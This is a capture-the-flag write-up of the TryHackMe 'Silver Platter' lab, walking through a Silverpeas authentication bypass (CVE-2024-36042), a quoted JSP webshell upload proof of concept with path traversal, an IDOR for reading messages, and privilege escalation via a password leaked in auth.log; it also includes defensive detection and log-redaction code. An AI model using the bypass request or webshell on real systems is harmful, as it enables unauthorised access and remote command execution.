Silver Platter writeup
Recon
Today I will be working on the Silver Platter lab in THM.
Starting off, I am just going to look through the website to hopefully get some useful OSINT.
I see that there are 4 links on the homepage:
INTRO, WORK, ABOUT, CONTACT.
Looking through these, I didn’t see anything too useful until I read into the CONTACT page. It says:
If you'd like to get in touch with us, please reach out to our project manager on Silverpeas. His username is "scr1ptkiddy".
It looks like this username could be used for a brute-force attack, as this user claims to be a project manager. Hopefully they have escalated privs on this web server.
Following this I am going to try a basic brute force. One thing to remember is that this lab makes a note to tell you they have secured their accounts against rockyou.txt so for now I will avoid that list.
First I need to find a login page. I tried running some large directory lists through gobuster but only got the following:
gobuster dir --url 10.201.13.3 -w Documents/tools/lists/gobuster_dsstorewordlist.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.201.13.3
[+] Method: GET
[+] Threads: 10
[+] Wordlist: Documents/tools/lists/gobuster_dsstorewordlist.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/assets (Status: 301) [Size: 178] [--> http://10.201.13.3/assets/]
/images (Status: 301) [Size: 178] [--> http://10.201.13.3/images/]
/LICENSE.txt (Status: 200) [Size: 17128]
/README.txt (Status: 200) [Size: 771]
Progress: 1828 / 1829 (99.95%)
===============================================================
Finished
===============================================================
Now I am going to see if I can find more information on how this site is hosted; hopefully I can find some kind of login portal with some searches.
I run this NMAP scan to see if I can get any services:
nmap -sC -sV 10.201.13.3
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-25 15:38 EDT
While I was waiting for this scan to finish I noticed something interesting. The contact page also mentions a tool called “Silverpeas” which is some kind of open-source tool. Going to their website, I found a GitHub repo. Maybe I can find some more OSINT here.
While digging around Silverpeas, I found that there was an authentication bypass vulnerability. I think this is our way in.
- First I will take a look at this writeup: https://gist.github.com/ChrisPritchard/4b6d5c70d9329ef116266a6c238dcb2d
CVE: CVE-2024-36042
Initial Exploitation
Reading through this post, it appears that login credentials are sent through HTTP POST requests… (jesus…)
According to this PoC, all you need to do is pass a username field and a blank password, and you will be signed in.
Let’s attempt this with my POST tool, POSTmortem.
I will be attempting this request:
POST /silverpeas/AuthenticationServlet HTTP/2
Host: 212.129.58.88
Content-Length: 28
Origin: https://212.129.58.88
Content-Type: application/x-www-form-urlencoded
Login=SilverAdmin&DomainId=0
After looking through some documentation on the CVE and Silverpeas, I found a login portal at: http://hackersite.com:8080/silverpeas/defaultLogin.jsp
(Ignore the DNS name; it is mapped to the IP of the victim’s server.)
This request did not seem to work, so let’s try to modify the request through Burp Suite.
Now I will attempt to intercept the login request and remove the password field.
I intercepted this POST request:
POST /silverpeas/AuthenticationServlet HTTP/1.1
Host: hackersite.com:8080
Content-Length: 49
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://hackersite.com:8080
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://hackersite.com:8080/silverpeas/defaultLogin.jsp
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=az7BzgSPx_DR_FsMeIRe2kmI30wL7ZiA7za1fFOU.ebabc79c6d2a
Connection: keep-alive
Login=SilverAdmin&Password=SilverAdmin&DomainId=0
Now I will remove the Password field:
Login=SilverAdmin&DomainId=0
And boom. We have admin access. My first instinct is to try and find an RCE, and hopefully we can pop a reverse shell on the administrator user.
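Seen from the defender's side, the request that worked here is a login POST with no Password parameter at all, which a reverse proxy or WAF hook can flag. The following is an added example, not part of the original writeup or of Silverpeas; the function names and the host silverpeas.example are assumptions, and the sample requests are constructed from the bodies shown above.

```python
from urllib.parse import parse_qs, urlsplit

# Endpoint taken from the requests in this writeup
LOGIN_PATH = "/silverpeas/AuthenticationServlet"

def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, target, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    method, target = head.split("\n")[0].split()[:2]
    return method.upper(), target, body.strip()

def classify_login(raw):
    """Return 'not-login', 'normal' or 'password-field-missing'."""
    method, target, body = parse_request(raw)
    url = urlsplit(target)
    if method != "POST" or url.path.rstrip("/") != LOGIN_PATH:
        return "not-login"
    # Servlet containers merge query-string and form-body parameters,
    # so look for the fields in both places.
    fields = parse_qs(url.query, keep_blank_values=True)
    fields.update(parse_qs(body, keep_blank_values=True))
    if "Login" not in fields:
        return "not-login"
    return "normal" if "Password" in fields else "password-field-missing"

# Constructed samples, trimmed from the two request bodies shown above
NORMAL = (
    "POST /silverpeas/AuthenticationServlet HTTP/1.1\n"
    "Host: silverpeas.example:8080\n"
    "Content-Type: application/x-www-form-urlencoded\n"
    "\n"
    "Login=SilverAdmin&Password=SilverAdmin&DomainId=0"
)
NO_PASSWORD = NORMAL.replace("&Password=SilverAdmin", "")
PASSWORD_IN_QUERY = NO_PASSWORD.replace(
    "AuthenticationServlet ", "AuthenticationServlet?Password=x ")

if __name__ == "__main__":
    for name, req in [("normal", NORMAL), ("no password", NO_PASSWORD),
                      ("password in query", PASSWORD_IN_QUERY)]:
        print(f"{name:18} -> {classify_login(req)}")
```

A hit on "password-field-missing" followed by a session being issued for that Login is the combination worth alerting on.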
It appears a researcher from Bishop Fox found an RCE through the upload feature; here is the PoC they gave:
POST /silverpeas/services/fileUpload HTTP/1.1
Host: vulns.lan:8000
Content-Type: application/octet-stream
X-FULL-PATH: ../../web/weblib.war/Aurora/css/webshell.jsp
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"\n"; }
} catch(IOException e) { e.printStackTrace(); }
%>
<%=output %>
I will attempt to use this for exploitation in BurpSuite.
After over an hour of debugging, it seems like this exploit will not work. I discovered another CVE, which covered an IDOR attack that let you read other users’ messages.
Post Exploitation
silverpeas/RSILVERMAIL/jsp/ReadMessage.jsp?ID=[messageID]
After going through each message, I was able to find SSH creds, so let’s try to log in.
BOOM! After logging into Tim’s account, I found the user.txt flag. Now let’s find the root flag.
Looking through the auth logs:
tim@ip-10-201-40-166:~$ cat /var/log/auth* | grep -i pass
I think I found a database cred; I will look around to see if I can find anything to log into the database.
Dec 13 15:40:33 silver-platter sudo: tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name postgresql -d -e POSTGRES_PASSWORD=_Zd_zx7N823/ -v postgresql-data:/var/lib/postgresql/data postgres:12.3
Dec 13 15:44:30 silver-platter sudo: tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name silverpeas -p 8080:8000 -d -e DB_NAME=Silverpeas -e DB_USER=silverpeas -e DB_PASSWORD=_Zd_zx7N823/ -v silverpeas-log:/opt/silverpeas/log -v silverpeas-data:/opt/silvepeas/data --link postgresql:database sivlerpeas:silverpeas-6.3.1
Dec 13 15:45:21 silver-platter sudo: tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name silverpeas -p 8080:8000 -d -e DB_NAME=Silverpeas -e DB_USER=silverpeas -e DB_PASSWORD=_Zd_zx7N823/ -v silverpeas-log:/opt/silverpeas/log -v silverpeas-data:/opt/silvepeas/data --link postgresql:database silverpeas:silverpeas-6.3.1
Dec 13 15:45:57 silver-platter sudo: tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name silverpeas -p 8080:8000 -d -e DB_NAME=Silverpeas -e DB_USER=silverpeas -e DB_PASSWORD=_Zd_zx7N823/ -v silverpeas-log:/opt/silverpeas/log -v silverpeas-data:/opt/silvepeas/data --link postgresql:database silverpeas:6.3.1
Running this command resulted in this output:
tim@ip-10-201-40-166:~$ /usr/bin/docker run --name silverpeas -p 8080:8000 -d -e DB_NAME=Silverpeas -e DB_USER=silverpeas -e DB_PASSWORD=_Zd_zx7N823/ -v silverpeas-log:/opt/silverpeas/log -v silverpeas-data:/opt/silvepeas/data --link postgresql:database silverpeas:6.3.1
docker: permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Post "http://%2Fvar%2Frun%2Fdocker.sock/v1.24/containers/create?name=silverpeas": dial unix /var/run/docker.sock: connect: permission denied.
See 'docker run --help'.
tim@ip-10-201-40-166:~$
This did not work so then I tried this:
tim@ip-10-201-40-166:~$ su - tyler
Password:
tyler@ip-10-201-40-166:~$
And I am in.
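The password was recoverable because it was passed with -e on a sudo command line, and sudo writes the full command to auth.log. The following is an added example, not part of the original writeup, that audits log lines in that layout for secret-looking arguments and masks them; the function names and the keyword heuristic are assumptions, and the sample lines are constructed with a placeholder secret.

```python
import re

# sudo's syslog line layout, as in the auth.log entries above
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s*:.*?USER=(?P<runas>\S+)\s*;\s*COMMAND=(?P<cmd>.*)$")
# NAME=value pairs whose name suggests a secret (assumed heuristic)
SECRET_RE = re.compile(
    r"(?P<name>\w*(?:PASS|SECRET|TOKEN|KEY)\w*)=(?P<value>\S+)", re.IGNORECASE)

def find_leaks(lines):
    """Report sudo commands that carry a secret-looking NAME=value argument."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = SUDO_RE.search(line)
        if not m:
            continue
        for s in SECRET_RE.finditer(m["cmd"]):
            findings.append({"line": lineno, "user": m["user"],
                             "runas": m["runas"], "name": s["name"]})
    return findings

def redact(line):
    """Mask the value of every secret-looking assignment in a log line."""
    return SECRET_RE.sub(lambda s: s["name"] + "=<redacted>", line)

# Constructed sample lines in the same layout; the secret is a placeholder
SAMPLE = [
    "Dec 13 15:40:33 host sudo: alice : TTY=tty1 ; PWD=/ ; USER=root ; "
    "COMMAND=/usr/bin/docker run --name db -d -e POSTGRES_PASSWORD=Placeholder-1 postgres:12.3",
    "Dec 13 15:41:02 host sshd[812]: Accepted password for bob from 192.0.2.10 port 50022 ssh2",
    "Dec 13 15:44:30 host sudo: alice : TTY=tty1 ; PWD=/ ; USER=root ; "
    "COMMAND=/usr/bin/docker run -d -e DB_USER=app -e DB_PASSWORD=Placeholder-1 app:1.0",
]

if __name__ == "__main__":
    for f in find_leaks(SAMPLE):
        print(f"line {f['line']}: {f['user']} ran a command as {f['runas']} exposing {f['name']}")
    print(redact(SAMPLE[0]))
```

Supplying the value through docker run --env-file keeps it out of the command line that sudo logs, and any secret already found this way should be rotated, since here the same value also worked for su.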
Now that I’m in, I ran “ls” and got no results; looks like it’s all dotfiles.
tyler@ip-10-201-40-166:~$ ls -la
total 36
drwxr-x--- 5 tyler tyler 4096 Dec 13 2023 .
drwxr-xr-x 6 root root 4096 Jul 21 20:10 ..
-rw------- 1 tyler tyler 54 Dec 13 2023 .bash_history
-rw-r--r-- 1 tyler tyler 220 Jan 6 2022 .bash_logout
-rw-r--r-- 1 tyler tyler 3771 Jan 6 2022 .bashrc
drwx------ 2 tyler tyler 4096 Dec 12 2023 .cache
drwxrwxr-x 3 tyler tyler 4096 Dec 13 2023 .local
-rw-r--r-- 1 tyler tyler 807 Jan 6 2022 .profile
drwx------ 2 tyler tyler 4096 Dec 12 2023 .ssh
-rw-r--r-- 1 tyler tyler 0 Dec 12 2023 .sudo_as_admin_successful
I figured I could see where tyler has gone by checking their history:
tyler@ip-10-201-40-166:~$ history
1 clear
2 ls
3 cd /home
4 ls
5 cd ..
6 sudo passwd tim
7 clear
8 exit
9 ls
10 ls -la
11 history
Let’s see what’s in their home folder:
tyler@ip-10-201-40-166:~$ cd /home
tyler@ip-10-201-40-166:/home$ ls
ssm-user tim tyler ubuntu
tyler@ip-10-201-40-166:/home$
It appears that Tyler has root access, so now all we need to do is run sudo su to get into root and cat root.txt. Boom, user and root pwned.